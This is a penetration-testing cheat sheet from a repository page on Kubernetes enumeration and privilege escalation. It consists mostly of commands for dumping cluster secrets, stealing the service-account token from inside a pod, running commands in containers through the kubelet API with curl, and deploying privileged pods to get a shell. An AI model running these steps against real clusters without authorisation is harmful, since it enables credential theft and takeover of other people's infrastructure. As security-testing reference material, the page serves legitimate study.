whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Enumeration/Kubernetes.md

109 lines
3.1 KiB
Markdown
Raw Blame History

## Kubernetes Enumeration
Levels of abstraction in a Kubernetes setup are high and challenging to maintain even if you get paid to work on the cluster.
Challenging part of enumerating a unknown Kubernetes cluster is the potential amount of possible different kinds and types of configurations.
Ideally, Kubernetes enumeration results in a (high privilege) token or ideally in credentials as secrets in the cluster.
## Kubectl
You should check for all kinds and types of configuration items in the namespaces you got permissions for.
Starting with a check of what you are permitted to list
```sh
kubectl auth can-i --list
```
Follow up with a listing and description of all pods, `-A` to list all namespaces.
```sh
kubectl get pods -A
```
Check if you can output mounted secret
```sh
kubectl get services
kubectl get secrets
kubectl get nodes
kubectl get deployments
kubectl get ingress
kubectl get jobs
```
* Intel about a secret, and output
```sh
kubectl describe secrets <secret> -o yaml
kubectl get secret <secret> -o json
kubectl describe secrets <secret> -o 'json'
```
### Abuse Token
* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
By any chance of an LFI extract the token and take a look on what you are permitted to list and describe using it.
```sh
kubectl auth can-i --list --token=$TOKEN
kubectl get pods --token=$TOKEN
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
```
* __Do not copy the token around, it will end in a carfuffle of some truncated string most of the time. Just store it in the following way and spare the pain for another day__
```
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
```
#### Elevate Permissions with found token
If a token has been found but its permissions on other containers can not be used through kubectl directly, try to use curl as well via the following line
```sh
curl -k -H "Authorization: Bearer $TOKEN" --data "cmd=id" https://$K8_IP:10250/run/$NAMESPACE/$POD/$CONTAINER
```
To create the URL you wnat to query, find namespace and pods
```sh
kubectl get pods -A
```
Next, take a look at the name of container inside the pod description under `ContainerStatuses/name`
```sh
kubectl get pod $POD -n $NAMESPACE -o yaml
```
Interesting find in any high priv container are
```sh
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/ca.crt
```
Enumerate again with the new found token
```sh
kubectl auth can-i --list
```
### Create Malicious Pods
* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
```sh
kubectl apply -f pod.yml --token=$TOKEN
```
* Start Pod
```sh
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
```
#### Start Pods
```sh
kubectl exec -it <podname> -n <namespace> -- /bin/bash
```
## Tools
### Microk8s
* [microk8s repo](https://github.com/ubuntu/microk8s)
### Enumeration of Microk8s
```sh
microk8s kubectl get nodes
microk8s kubectl get services
microk8s kubectl get pods
microk8s kubectl get deployments -o wide
microk8s kubectl cluster-info
```
Reference in New Issue View Git Blame Copy Permalink